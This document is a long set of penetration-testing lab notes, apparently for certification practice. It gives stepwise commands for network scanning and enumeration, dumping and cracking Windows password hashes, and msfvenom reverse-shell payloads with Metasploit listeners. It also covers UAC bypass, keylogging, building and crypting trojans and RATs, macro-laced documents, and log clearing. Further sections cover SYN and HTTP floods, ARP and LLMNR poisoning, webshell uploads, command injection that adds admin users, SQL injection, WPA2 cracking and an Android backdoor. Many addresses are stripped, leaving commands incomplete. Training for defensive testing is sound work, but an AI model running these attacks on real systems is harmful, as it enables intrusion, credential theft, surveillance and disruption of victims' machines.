Penetration Testing Checklists 2022
Table of Contents
ping hostname
-f switch do not fragment, uses to send same length, does not allow to be fragmented by routers Ping host -f -l 1300
-l buffer size Tracert host Firebug in mozilla
WinHTTrack website copier
Path Analyzer Pro in traceroute tools, ensure icmp and smart is selected, stop on control is selected Select timed trace when launching scan
Metasploit service postgresql start. The msfconsole
If db not initialized
msfdb init
service postgresql restart
Run nmap from msfconsole nmap -Pn -sS -A -oX Test (-sS (TCP SYN scan) -Pn (No ping)
-A: Enable OS detection, version detection, script scanning, and traceroute)
db_import Test to import test results Type hosts to view host information
Type services to view services info for all detected hosts
db_nmap -sS -A the db_nmap automatically stores result to the msf db
use scanner/smb/smb_version to find out smb version
show options to set options for the utility set RHOSTS and press Enter. Type set THREADS 100 and press Enter.
Type run to start
Now type hosts again and os_flavor will be visible
Ethernet interface
hping3 -c 3 -c 3 means 3 packets
hping3 --scan 1-3000 -S -scan (port range) -S SYN Flag
hping3 --udp --rand-source --data 500 --udp udp mode –rand-source changes source address –data data length
hping3 -S -p 80 -c 5 -p send packet to specified port
hping3 –flood send flood packets to the target machine
Ping the server machines from different sources and look at TTL values to identify OS under the IPV4 info.
Windows 10: 128
Ubuntu: 64
ColaSof t Packet Builder
Select Adapter from right top corner
Click Add to create packet. Leave default ARP settings press OK. Send all and select burst mode.
Export as colasoft cscpkt
When opens displays sys info by default
Click IP scanner from left and enter range. Then click start. Right click aby alive IP and click Traceroute
Now select Port scanner from left pane and enter IP address Add and check it and click start
nmap -O 10.10.10.* shows OS info for IPs from 0-254
nmap --packet-trace show all sent and received packets Slow comprehensive scan from settings
-SN Null scan
Go to the profile tab to make and edit scan profiles
nmap -sT -T3 -A -sT TCP connect scan. Requires no special privileges to run
nmap -sX -T4 -sX Xmas scan, turn on all flags
nmap -sA -v -T4 -sA Ack scan. No response means the port is filtered and an unfiltered response means the port is closed
nmap -F <IP> Fast scan
nmap -Pn -p 80 -sI -sI idle/zombie scan <Zombie IP> <Target IP>
nmap -sP 10.10.10.* -sP ping scan, only checks for alive hosts, no port scan Also -sn
nmap -f <target IP> | fragments packets nmap –mtu <value> <target IP> | to customize packet in bytes, Must be multiple of 8
nmap -D RND:10 | -D RND use random decoy IPs, in this example 10 Decoy IPs are generated
NetScan Tools Pro
Start Demo
Click Manual Tools. Select ARP Ping
Click on Send Broadcast ARP, then Unicast ARP
Select IP and click on send ARP Now Select ARP Scan (MAC Scan)
Select range from X.X.X.(1-255). Click Do Arp Scan
Now open Ping Scanner in manual Tools. Remember to use system DNS. Select IP range. Click start
Now use Port Scanner in manual tools. Select scan type TCP connect, select Target IP. Select range of ports and okay.
SolarWinds Network Topology Mapper
Click New scan, set qwerty@123 as password
Select private in the Stored Credentials section and public in the Discovery Credentials section In the Network Selection tab, click on IP ranges, define IP range and click next
In scheduling run scan now After summary, run discovery
Map will show, click on Node options to view IP addresses of discovered devices
Right click node, click integration with windows tools, then remote Desktop. martin:apple for login.
Angry IP Scanner
Set IP Range. Click on the wheel (preferences option). Select udp and tcp from pinging options. Select ports 1-1000 for custom scan.
Select only Alive Hosts display.
Choose Name Scanner from the options shown on the lower tab. Set IP range and start. Choose Port Scanner from the options shown on the lower tab. Set IP range and start. Choose UDP Scanner from the options shown on the lower tab. Set IP range and start. Choose Ping Scanner from the options shown on the lower tab. Set IP range and start.
Global Network Inventory
New Audit windows opens by default. Click Next
Select IP range scan. Enter IP Range. Run credential scan Administrator:Pa$$w0rd. Click Finish. View results. Click different tabs on top to view different results.
View Operating System, BIOS, NetBIOS, User Groups, Users, Services, and Installed Software.
Advanced IP Scanner
Specify IP range and start.
Right click on alive hosts to perform actions, e.g. shutdown. Use Radmin for advanced features.
Click on Windows Enumeration, Enter IP and click Enumerate
Expand local workstation to view Users, Services, User Rights, Scheduled Jobs
NetBIOS Enumerator
Enter IP Range and click scan.
SoftPerfect Network Scanner
Enter IP Range and click on start scanning.
Right click on any IP and click on Properties to view details.
Right click on any IP and click on Open Device to connect to the target machine. Click on “+” sign to view shared folders.
nmap -O | OS detection scan | port 139 NetBIOS
nmap -sP | perform ping sweep
nmap -sS | perform SYN stealth scan
nmap -sSV -O | perform SYN, version, OS detection scan
nmap -sSV -O -oN Enumeration.txt | oN saves the scan in nmap format
Using CMD net
nbtstat –A display table using target IP first <00> shows workstation
<20> shares enabled
net view <IP> | enumerate share paths
net use command to view the created null sessions/shared folders from your host net use \\\e ““\user:”” create a null session with the target (\ slash) net use \\\e ““/user:”” to view connection details (/ slash)
Go to explorer and disconnect Z drive
Then use net use to view connected null session
SNMP Enumeration
Simple Network Management Protocol UDP Port 161, Accessed via community strings, read only, read/write
nmap -sU -p 161 <target IP>
nmap -sU -p 161 --script=snmp-brute | brute force SNMP community string
use auxiliary/scanner/snmp/snmp_login | set RHOSTS | exploit
use auxiliary/scanner/snmp/snmp_enum | set RHOSTS | exploit
Active Directory Explorer – LDAP enumeration
Type IP to connect to. <Optionally enter a domain admin credentials for advanced features, here CEH\Jason:qwerty as a sample user>.
Expand DC=CEH,DC=com and expand CN=Users
Expand a user-name and modify display name
Enum4linux [options] IP
enum4linux -u martin -p apple -U | - u user -p pass -U get user list
enum4linux -u martin -p apple -o | -o get OS info
enum4linux -u martin -p apple -P | -P get password policy info enum4linux -u martin -p apple -G | -G get groups and members info enum4linux -u martin -p apple -S | -S get share list info
enum4linux -u martin -p apple -a | -a get all simple enumeration data [-U -S -G -P -r -o -n -i]
https://localhost:8834 admin:password
Click Policies under Resources Tab on left side. Create New Policy Advanced ScanSet Name and DescriptionDiscovery in settings tabHost DiscoveryTurn off Ping the remote hostPort scanning Turn on Verify open TCP ports found by local port enumeratorsReport (do not alter any settings)Advanced Max number of TCP sessions per host and Max number of TCP sessions per scan as unlimitedCredentialsHostWindows AD143:qwerty@123Save
ScanCreate a new scanUser DefinedCustom_PolicySet name and targetLaunch
nikto -h | view command help| -H for full help text
nikto -h -Tuning 1 |-Tuning 1 Scan tuning 1=Interesting File / Seen in logs
Dump and Crack SAM (Security Account Manager) hashes
Windows stores passwords in LM and NTLM hash format | NTLM New Technology LAN Manager. Need admin access to dump SAM.
WMIC (Windows Management Instrumentation Command) CLI to get info about local system
wmic useraccount get name,sid | displays usernames and their SIDs
Pwdump7 (To dump password hashes)
pwdump7.exe -d c:\lockedfile.dat backup-lockedfile.dat |dump protected file
Brows admin terminal to pwdump7 path and run pwdump.exe in cmd | shows password hashes
PwDump7.exe > c:\hashes.txt | export hashes to path defined
In text file replace boxes with account names obtained from WMIC. The last code numbers will be the
identity. And Save the file
Ophcrack (To crack password hashes)
To crack passwords not longer than 14 characters using only alphanumeric characters
Open /x86 gui version. Load PWDUMP and select the hashes.txt file.
Select Table Vista Free. Install it from location where ophcrack files are placed. Click Crack to start cracking
Copy the Hashes.txt to shared drive for future labs.
Winrtgen – Create Rainbow table
Click on add table
Select hash NTLM, min length 4, max length 6, Chain Count 4000000, Charset Loweralpha Click OK on main window to start , table is saved in Winrtgen folder.
Rainbow Crack
Open rcrack_gui.exe
Click File, then select Load NTLM hashes from PWDUMP
Open Hashes.txt saved from before
Now click Rainbow Table Select Rainbow table Select table created by winrtgen crack process automatically starts
Open Password Auditing Wizard. Choose Windows. Select Remote Machine Type Host:, Select the Use Specific User Credentials Administrator:Pa$$
Select Strong Password Audit Perform Calibration? click No.
Establish VNC connection to target machine using MSFVENOM and MSFCONSLE
Payload setup
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST= LPORT=444 -o /root/Desktop/Test.exe | -p payload, --platform platform of the target, -a architecture, -f output format, -o save the output path
Type mkdir /var/www/html/share | make directory
Type chmod -R 755 /var/www/html/share | change rights recursively to all files and folders inside
Type chown -R www-data:www-data /var/www/html/share | change owner recursively owner:group
mv /root/Desktop/Test.exe /var/www/html/share | move the exploit
service apache2 start
Listener Setup
Start Metasploit Framework
Type use multi/handler
Type set payload windows/meterpreter/reverse_tcp
Type set LHOST
Type set LPORT 444
Execute Exploit
Open on victim machine. Download Payload and run.
Meterpreter shell is opened on attacker side. Type sysinfo to get system details.
Type run vnc to start vnc viewer.
Privilege Escalation using MSFVENOM and MSFCONSOLE
Payload Setup
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST= -f exe > Desktop/Exploit.exe | -e encoder, -b list of bad characters to avoid
Type mkdir /var/www/html/share | make directory
Type chmod -R 755 /var/www/html/share | change rights recursively to all files and folders inside
Type chown -R www-data:www-data /var/www/html/share | change owner recursively owner:group
mv /root/Desktop/Test.exe /var/www/html/share | move to exploit
service apache2 start
Listener Setup
Type use exploit/multi/handler.
Type set payload windows/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit -j -z |exploit -j -z exploit tells Metasploit to start the exploit. The -j flag tells it to run in the context of a job and -z simply means to not interact with the session once it becomes active.
Execute Exploit
Open on victim machine. Download Payload and run.
Type sessions -i to view sessions
Type sessions -i 1 to interact with the session created
Type getuid to get user id
Run post exploitation exploit run post/windows/gather/smart_hashdump | will fail right now
Type getsystem | will fail right now | use getystem -h to view all available methods
Type getsystem -t 1 | use technique 1 to escalate privileges | will fail right now
Type background | backgrounds the meterpreter session.
Type search uac in msfconsole | get view modules related to uac
Payload and Exploit Setup – Phase 2
Type use exploit/windows/local/bypassuac_fodhelper
Type show options | to view options related to the payload
Type set SESSION 1 | the previous opened meterpreter session id
Type set payload windows/meterpreter/reverse_tcp
Type set LHOST
Type set TARGET 0
Type exploit
Type getuid to get user id
Type getsystem | to escalate privileges
Run post exploitation exploit run post/windows/gather/smart_hashdump | to dump password hashes
Post Exploitation Activities on Target
Create secret.txt on Windows Desktop
Setup and run exploit like did it previous exercise
After meterpreter is successfully running, try these commands:
cat secret.txt
timestomp secret.txt -v | view modified, accessed, created time of file
cd c:\ pwd ls
download bootmgr | downloads the bootmgr file from c:\ to home directory of kali
search -f “filename.ext” |here “pagefile.sys” | displays complete path of file
keyscan_start | to start keylogger
keyscan_dump | to dump keylogger results
idletime | shows the time the target user has been away from keyboard
shutdown | shutdown the victim machine
SpyTech SpyAgent
RDP to victim machine. Install SpyAgent from shared path
Start SpyAgent Continue Set password Complete + Stealth Configuration Load on Windows Startup Start monitoring CTRL+ALT+SHIFT+M to bring SpyAgent out of stealth mode
Power Spy
RDP to victim machine. Install Power Spy from shared path
Start Power Spy Set password Start monitoring + stealth mode CTRL+ALT+X to bring Power Spy out of stealth mode
Hiding file in NTFS stream
Copy calc.exe from system32 dir.
Make c:\magic folder. Copy calc.exe inside it, and create a text file readme.txt Type type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
Type mklink backdoor.exe readme.txt:calc.exe
Execute backdoor.exe
SNOW Steganographic Nature Of Whitespace) Hiding Data Using White Space Steganography
Create a text file readme.txt like this
Hello world!!!!!
Copy it inside the SNOW folder Open cmd in the folder
Type snow -C -m "Secret message" -p "password" <original file name> <target file name> |-C compression, -m message string, -p password | Hide method
Type snow -C -p "password" <file name to unhide data>
OpenStego – Image Steganography
Hide data
Select text message file which you want to hide
Select the cover file image where data is to be hidden
Set output path and file name
Set password if needed
Click Hide Data
Extract Data
Select the stegno file
Set the Output folder path
Give the password
Cick Extract Data
QuickStego – Image Steganography
Hide data
Select the open image option to browse the image where data is to be hidden
Select the open text option to browse the text file which you want to hide
Click Hide Text to embed text in image
Click Save Image to output the result image
Extract Data
Select the open image option to open the modified image
Hidden text will be displayed in right side bar
Auditpol to clear attacker tracks by viewing, enabling, or clearinga audit logs
Open cmd
auditpol /get /category:* | get auditpolicies for all categories| auditpol –help for help | additpol /get /? for command help
auditpol /set /category:"system","account logon" /success:enable /failure:enable | to set audit policies on categories separated by: then set success and failure audit status
auditpol /clear /y | disable audit policies on all categories
Covert_TCP – Covert Channels | Hiding traffic in IP4 headers to avoid detection
Sender side (
mkdir send
cd send
echo “secret” > message.txt
Copy covert_tcp.c from shared path
cc -o covert_tcp covert_tcp.c
To send message use command ./covert_tcp -dest -source -source_port 8888 -dest_port 9999 -file /root/Desktop/send/message.txt | -dest <destination/receiver IP>
-source<sender IP> -file <file path> | do not run until listener is started on receiver machine
Start wireshark before sending to capture the traffic
View IP4 header in Wireshark traffic to view message byte by byte in order
Receiver side (
mkdir receive
cd receive
Copy covert_tcp.c from shared path
cc -o covert_tcp covert_tcp.c
To receive message start a listener using ./covert_tcp -dest -source
-source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/receive/receive.txt|
-dest <destination/receiver IP> -source<sender IP> -file <file path to store received file>
TheFatRat – Create malicious office Documents
Payload and malicious file creation
Note: FUD (Fully Undetectable Crypter)
start terminal
Run commnd fatrat | takes time to load
Choose [6] [3] <LHOST IP> <LPORT> <payload name> [3] Enter to create payload
Choose [7] [2] <LHOST IP> <LPORT> <malicious doc name> <choose text or leave default> <Enter path of previous custom payload /root/TheFatRat/output/payload.exe>
[3] Enter
Host payload using previously shown methods or run python -m SimpleHTTPServer for easy hosting
Listener Setup
Type use exploit/multi/handler.
Type set payload windows/meterpreter/reverse_tcp.
Type set LHOST
Type set LPORT 4444.
Start listener, type run
Execute Exploit
Download word file from hosting URL
Open and enable macros
Meterpreter session will be started on msfconsole
Responder – LLMNR and NBT-NS Poisoning
Use windows 10 credentials Jason:qwerty
Run command responder -I eth0 in Kali | “-I” is in CAPS
Try to open a share \\ceh-tools from windows 10 machine. Responder will send fake replies. | Windows will use, LLMNR on UDP/5355 or NBT-NS on UDP/137 and will listen for broadcasts.
User will enter credentials and hash will be intercepted by responder
Responder log files in usr\share\responder\logs
Use john the ripper to crack the password using command john
/usr/share/responder/logs/<file name of the logs.txt> | here file is SMBv2-NTLMv2-SSP-
Web server trojan which allows access to victim’s machine via a web browser
Run httprat.exe
Disable the notification option.
Set server port 84. And create the httpserver.exe
Run this httpserver.exe on the victim machine.
Browser victim’s IP from attacker’s machine to gain web access to the victim
You can view processes, system info, view drives and directories
MoSucker GUI Trojan
Created in visual basic, can be set up to auto load on the victim machine, allows to perform many actions
Go to MoSucker Folder
Run CreateServer.exe. Leave default settings. Press OK. Save filename as server.exe
Now MoSucker 3.0 Edit server window opens. Remember server Port 4288.
Select Keylogger option and Enable off-line keylogger.
Open MoSucker.exe and enter victim IP and port in given tabs.
On the window machine execute the server.exe file and you will get an error. Ignore the error.
On the attacker machine click on connect on the MoSucker.exe windows and you will be connected to the victim machine.
Start Live Capture to remotely view the machine
On victim machine open firewall settings and use recommended settings
On attacker machine start njRAT
Click start with default port 5552
Click on Builder tab on the bottom
Enter HOST IP (Attacker machine), check options Copy To StartUp and Registry StartUp, and click Build.
Save file as Test.exe
Open the malicious exe file on victim’s machine.
Connection would be shown on attacker njRAT window.
Now attacker can perform different actions on the victim machine
SwayzCryptor – Obfuscate Trojan Binary
Run SwayzCryptor. Click File option and browse to previous created malware from njRAT Test.exe.
Select Start up, Mutex, and Disable UAC, and click Encrypt. Save file as CryptedFile.exe.
Run file on victim machine. New connection will be shown on njRAT window on attacker machine.
Create (bottom left corner) Create ProRat Server (342 Kbayt) Notification setting (leave deafult) General Settings (only leave last 4 invisibility settings checked – remember the password) Bind with file (Select image from prorat image folder) Server Extensions {EXE (Has icon support)} Server Icon (select any) Create Server
Named saved as binded_server by default.
Open malicious file on victim machine
On attacker machine, enter victim IP and Port (if changed) and click Connect. Enter password.
Now do actions on left side to perform on victim machine
Run server.exe on victim machine
Run client.exe on attacker machine
JPS Virus Maker
Open JPS Virus Maker.
Select Options
Disable Yahoo,
Disable Internet Explorer,
Disable Norton Anti Virus,
Disable McAfee Anti Virus,
Disable Taskbar,
Disable Security Center,
Disable Control Panel,
Hide Windows Clock,
Hide All Tasks in Taskmgr,
Change Explorer Caption,
Destroy Taskbar,
Destroy Offlines (Y!Messenger),
Destroy Audio Service,
Terminate Windows
Auto Startup.
Choose Restart
Name after install Rundll32
Server Name Svchost.exe
Click Create Virus
Click >> for further options.
Select Options
Change XP Password option,
Change Computer Name option,
Check Change IE Home Page option
Check the Enable Convert to Worm checkbox, and provide a Worm Name (here, fedevi).
Select JPG Icon
Click Restart radio button
Create Virus
Internet Worm Maker Thing
Select different options and create the worm.vbs file located in c:\
IDA – Malware Analysis
Click New
Load from viruses folder Klez Virus Live!\face.exe.
Keep default settings and OK
View Graphs Flow Chart
View Graphs Function Calls
Windows Hex View-1
Windows Structures
OllyDbg – Virus Analysis
Load virus from Viruses\tini.exe
View Log
View Executable modules
View Memory
View Threads
Detecting Trojans
View local ports, protocol, end process etc.
Autoruns for windows
View Everything, Explorer, Services, Drivers, Known DLLs
jv16 Power Tools 2017
Click Clean and SpeedUp My computer. Click Start
Expand Registry Errors
Select All errors and Delete.
Click Control which programs start automatically.
Create trojan using njRAT and monitor it using CurrPorts.
ClamWin – Malware Removal
Click the 3rd Top icon (Scan Computer Memory for Viruses)
Now scan C drive
Run Regshot-x64-Unicode.exe as Administrator
Select HTML Document
Select 1st Shot and Save
Install a software and run 2nd Shot and Save
Now Select Compare WinPatrol – Startup Monitoring Tool
Click Startup Programs to view startup programs.
Click IE Helpers, shows tools used to IE during start. Remove Java TM plugin SSV Helper.
Click Services, shows installed services, Right click to view service Info. Startup can be enabled or disabled from the info menu.
Click File Types, view programs associated to a file type. Like Winrar for rar files. Right Click for
Info then click Expand Info.
Click Active Tasks, shows current active tasks, Right click to Kill any task
Capture login credentials for first task. Easy
Now for remote packet capture
Go to services on target machine and start the Remote Packet Capture Protocol v.0 (experimental) service.
Now in attacker machine, click on Capture Options (Ctrl+K) Manage Interfaces Remote Interfaces Add (+) Enter Host (, Port 2022, and credentials (martin:apple) Only select New interface from Input Start
Capsa Network Analyzer
Select Ethernet interface.
Dashboard Summary Protocol MAC Endpoint IP Endpoint MAC Conversation IP Conversation UDP Conversation Matrix Packet Report Tab
Select Random to generate a random MAC address
Forward button next to Network Connection to change adapters
Forward button next to Hardware ID to view Configuration ID
Click IPConfig to view IP info
Click MAC List to import MAC IDs from a text file
Select Update MAC to change the MAC Address.
Cain & Abel – MITM attack tool (via ARP Poisoning)
Click Configure.
Select Adapter with the Attacker’s IP in the Sniffer tab.
Click on Start/Stop Sniffer (2nd icon in icon list) icon.
Go to the Sniffer Sub tab.
Click the Blue + (Add) icon.
In MAC Scanner window select All Hosts and All Tests.
Click ARP on lower left corner. Then click anywhere inside ARP window to so + icon is clickable.
Select 1st victim IP (, now select 2nd victim IP (
Click on Start/Stop ARP (3rd icon in icon list) icon.
Now do FTP from .12 IP to .10 with credentials martin:apple.
Observe that packets will be generated in cain.
Click Passwords FTP View captured credentials.
Detect ARP Poisoning using Wireshark
Create an attack between two machines as shown above.
Here, Attacker is Victims are and
Generate some random traffic between the victims e.g from .11 machine use hping3 -c 100000
Open Wireshark on Attacker machine.
Click Edit Preferences Protocols ARP/RARP Detect ARP request storms and Detect duplicate IP address configuration Start Capture.
Analyze Expert Information
XArp Tool – ARP Poisoning Detection
Set Security level as aggressive.
Launch an ARP attack on the network.
View ARP poisoning alerts in XARP.
Social Engineering Toolkit (SET)
Use Credential Harvester to clone a website and capture victim credentials.
SYN Flooding using Metasploit
Check open port on using nmap | nmap -p 21
Open Metasploit Framework
Type use auxiliary/dos/tcp/synflood |SYN Flooding module
Type set RHOST [Victim IP] and press Enter
Type set RPORT 21 and press Enter
Type set SHOST [Spoofed IP Address] and press Enter
Type set TIMEOUT 20000 and press Enter
View Flood attack on victim via Wireshark | use filter tcp.port=21
SYN Flooding using HPING3
hping3 -S [Victim IP Address] -a [Atacker/Spoofed IP Address] -p [Port to flood e.g 22] –flood | -S turn on SYN Flag, --flood sent packets as fast as possible. Do not show replies
HTTP Flooding Attack using HOIC (High Orbit Ion Cannon)
Open HOIC.
Set threads = 20
Click + to add target
Enter Target http://<Target IP> Power = High Booster = GenericBoost.hoic
Click FIRE TEH LAZER! to launch attack
OWASP Zed Attack Proxy (ZAP)
First set Victim’s Proxy settings to attacker’s IP and port 8080.
Open ZAP and enable Break Point and click green + to view break points
Go to settings local Proxies Change IP from localhost to network IP (in this case
Browse from victim and view the request and responses on the attacker machine.
Snort – Intrusion Detection
Copy snort.conf from shared folder (Snort\snortrules\etc) to C:\Snort\etc.
Copy so_rules folder from shared folder (Snort\snortrules) to C:\Snort.
Copy preproc_rules folder from shared folder (Snort\snortrules) to C:\Snort.
Copy rules folder from shared folder (Snort\snortrules) to C:\Snort.
Go to folder C:\Snort\bin and open snort in cmd.
Enter snort -W to view ethernet info. Default ethernet index is 1.
Enter snort -dev -i 1 to enable Ethernet Driver.
Open 2nd CMD Window. Leave the first one open.
Ping a machine from the 2nd CMD window. Snort will generate some alerts in the first window, this means it is working.
Close both cmd terminals.
Conf file Edit
Open C:\Snort\etc\snort.conf in Notepad++
HOME_NET line (Line 45), replace any with the IP addresses of the machine on which Snort is running. Here
RULE_PATH (Line 104). In Line 104 replace ../rules with C:\Snort\rules, in Line 105 ../so_rules replace with C:\Snort\so_rules, and in Line 106 replace ../preproc_rules with C:\Snort\preproc_rules.
Lines 109 and 110, replace ../rules with C:\Snort\rules.
Open C:Snort\rules, create file white_list.rules and black_list.rules.
Again, open snort.conf file.
Dynamic preprocessor libraries (Line 243), replace /usr/local/lib/snort_dynamicpreprocessor/
with C:\Snort\lib\snort_dynamicpreprocessor.
Base preprocessor (or dynamic) engine (Line 246); replace
/usr/local/lib/snort_dynamicengine/ with
Comment (#) Line 249.
Comment (#) Lines 261-265.
Line 325 delete lzma word.
Remove \ on Line 504-509.
Comment (#) Lines 504-509.
Add C:\Snort\etc\classification.config Line 531 and C:\Snort\etc\reference.config Line 532.
Add output alert_fast: alerts.ids Line 533.
Now open Replace all and replace ipvar with var.
Save the snort.conf fie.
ICMP Detection Rule
Open C:\Snort\rules\icmp-info.rules.
Type alert icmp $EXTERNAL_NET any -> $HOME_NET (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;) in Line 21.
Save the file.
Start Snort in IDS mode
Opne cmd in C:Snort and Type snort -iX -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii | here X=1 , l is small L
Ping the snort machine and rules will be displayed in cmd
HoneyBOT – Malicious Network Traffic Detection
Open inetmgr
Expand Server node Sites FTP Right click Manage FTP Stop
Install HoneyBOT
Configure HoneyBOT
General settings as default
Exports Export Logs to CSV.
Target the honeyBOT machine with ftp connection.
View logs and details
Nmap Evasion Techniques – Firewall Rule Bypass
Enable victim firewall. Create inbound rule and block connection from attacker IP.
Run different scans from attacker machine. Use Zombie scan to bypass firewall rule. | nmap -sI
<Zombie IP> <Target IP>
HTTHOST AND HTTPORT - Bypassing Firewall Rules Using HTTP/FTP Tunneling
Setup HTTHOST (this will route the request of restricted machine)
Open Services. Disable IIS Admin Service and World Wide Web Publishing.
Open HTTHost Options tab, keep default options
Change Personal Password to “magic”.
Check Revalidate DNS names and Log Connections, click Apply
Open Application log and see listening at
Leave HTTHost on.
Setup HTTPORT (this will be setup on machine with restricted access)
Open inetmgr
Expand Server node Sites FTP Right click Manage FTP Stop
Turn on firewall from Control Panel.
Create Outbound Firewall Rule.
Select Port as Rule Type
Select All remote ports in Protocol and Ports
Next Block the Connection
Set Rule name and finish.
Right click new rule and go to properties. In Protocols and Ports Remote Port Specific Ports 21 Apply.
Now connection to remote machines on port 21 is blocked.
Install HTTPort and run
Go to Proxy tab Enter Host name of HTTHOST machine and port 80 Bypass mode (Remote Host) Use personal Remote host (Enter Host name of HTTHOST machine and port 80 and password “magic”).
Go to Port mapping Add New Mapping (Edit and rename ftp test) Local Port (Edit 21)
Remote Host ( the host which we want to connect to) Remote Port (21).
Cick Proxy and Start
Access remote host via ftp | Jason:qwerty
Type mkdir Test | will create directory inside remote host c:\FTP
Metasploit – Firewall Bypass
Turn on firewall on victim machine
Payload Setup
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST= -f exe > Desktop/Exploit.exe | -e encoder, -b list of bad characters to avoid
Type mkdir /var/www/html/share | make directory
Type chmod -R 755 /var/www/html/share | change rights recursively to all files and folders inside
Type chown -R www-data:www-data /var/www/html/share | change owner recursively owner:group
mv /root/Desktop/Test.exe /var/www/html/share | move to exploit
service apache2 start
Listener Setup
Type use exploit/multi/handler.
Type set payload windows/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit -j -z |exploit -j -z exploit tells Metasploit to start the exploit. The -j flag tells it to run in the context of a job and -z simply means to not interact with the session once it becomes active.
Execute Exploit
Open on victim machine. Download Payload and run.
Type sessions -i to view sessions
Type sessions -i 1 to interact with the session created
Type execute -f cmd.exe -c -H | creates a channel to execute the victim command shell
Now Type shell | opens an interactive shell (cmd)
Type netsh firewall show opmode | to shown firewall stats
Type netsh advfirewall set allprofiles state off | to turn off firewall.
Type getsystem
Type ps | processes
Skipfish – Webserver Reconnaissance
skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl | -o path to store output, -S read only word list
httprecon Tool – Webserver Foot printing
Open tool on Windows
Enter IP and Port
Click Analyze
ID Server - Webserver Foot printing
ID Serve determines the domain name associated with an IP address.
Click the Server Query tab. In option 1, enter the URL (
Click Query the Server
HYDRA – FTP Brute force
hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP Address of Windows 10] | -L username wordlist -P password wordlist, -t 4 option sometimes 16 threads result in no results
Use mkdir command to make a directory and view on remote system for proof
Uniscan - WebServer Fingerprinting (Kali)
Use uniscan -h | for usage techniques
uniscan -u -qwed | -u url scan . -q directory check, - w file check,
-e robots.txt and sitemap.xml check, -d for dynamic checks
To view report, go to /usr/share/uniscan/report
Parameter Tampering and XSS
Change id parameter in profile to view other profiles.
For XSS, type the script in comments field in contact page. (This is stored XSS and will be shown to every user who views the contact tab)
WPScan and Metasploit – Enumerating and Web App Hacking
Use wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u | enumerate user list
In msfconsole use auxiliary/scanner/http/wordpress_login_enum
Type set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
Type set RHOSTS [IP Address of Windows Server 2012]
Type set RPORT 8080
Type set TARGETURI /CEH/ or complete URL
Type set USERNAME admin and press Enter to set the username as admin.
Type run
Use URL http://[IP Address of Windows Server 2012]:8080/CEH/wp-login.php to login.
Remote Command Execution - Exploiting Vulnerability in DVWA | gordonb:abc123
Set Security settings to low
| hostname
| whoami
| tasklist
| dir C:\
| net user
| net user <username> /add | add custom user
| net user <username>
| net localgroup Administrators <username> /add | add user to admin group
VEGA -Web Application Audit (Kali)
Open from Web application analysis
Start New Scan
Enter URL
Select all modules
Leave rest settings as default and start.
Acunetix WVS (Windows)
Install with password qwerty@1234 and port 13443
Add target.
Run Full Scan with OWASP 2013 report.
File Upload Vulnerability – All Levels DVWA
Payload Creation
msfvenom -p php/meterpreter/reverse_tcp lhost= lport=4444 -f raw | create a raw php code
Copy the code in a text file and save as .php
Low Level Exploitation
Upload the file | note the path /dvwa/hackable/uploads/<filename>.php
Run listener by starting msfconsole
Type use exploit/multi/handler.
Type set payload php/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit
Browse link of file to start meterpreter session.
Medium Level Exploitation
Rename file as <filename>.php.jpg
While uploading, intercepting with burp and rename back to <filename>.php
Run listener by starting msfconsole
Type use exploit/multi/handler.
Type set payload php/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit
Browse link of file to start meterpreter session.
High Level Exploitation
Open the <filename>.php file and add code GIF98 at start and save file as <filename>.jpg
Upload file
Now go to command execution tab and use command <Some IP>||copy C:\wamp64\www\DVWA\hackable\uploads\<filename>.jpg C:\wamp64\www\DVWA\hackable\uploads\shell.php
Run listener by starting msfconsole
Type use exploit/multi/handler.
Type set payload php/meterpreter/reverse_tcp.
Type set LHOST
Start listener, type exploit
Browse link of file to start meterpreter session.
Cross-Site Request Forgery (CSRF)
Open | admin:qwerty@123
Plugins Installed Plugins Firewall 2 Settings View Whitelisted IP
Run command wpscan -u --enumerate vp | vp vulnerable plugins
Create a form with code
Save as <filename.html>
<form method="POST" action=" page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
<script>alert("As an Admin, To enable additional security to your Website. Click Submit")</script>
<input type="hidden" name="whitelisted_ip[]" value="" >
<input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs" class="button- secondary">
<input type="submit">
Get victim to run it
Manual Injection
‘ or 1=1 -- | for login bypass
‘insert into login values ('john','apple123'); -- | create own user in the database
‘create database mydatabase; -- | create database with name of mydatabase
‘exec master..xp_cmdshell 'ping -l 65000 -t'; -- | execute ping on moviescope
N-Stalker Free X - Web Application Security Scanner
Open tool, Enter URL and select OWASP Policy, Click Start Scan Wizard.
Leave Settings as default and start session.
Start scan. Wait for scan to complete to view results.
Login into website, Get user session cookie via document.cookie is console.
sqlmap -u “” --cookie=<”cookie values”>
sqlmap -u “” --cookie=<”cookie values”>
-D <database name> --tables
sqlmap -u “” --cookie=<”cookie values”>
-D <database name> -T <table name> --columns
sqlmap -u “” --cookie=<”cookie values”>
-D <database name> -T <table name> --dump
sqlmap -u “” --cookie=<”cookie values”>
aircrack-ng '/root/Desktop/Sample Captures/WEPcrack-01.cap' | ‘’ are not needed if there is no space in folder name
aircrack-ng -a 2 -b 20:E5:2A:E4:38:00 -w /root/Desktop/Wordlists/Passwords.txt '/root/Desktop/Sample Captures/WPA2crack-01.cap' | -a 2 mode WPA2, -b bssid, -w worlist
Generating and Executing Payloads for Android
Setup Android
Open terminal, run su
Run ip addr add dev eth0
Generate Payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST= R > Desktop/Backdoor.apk | R raw
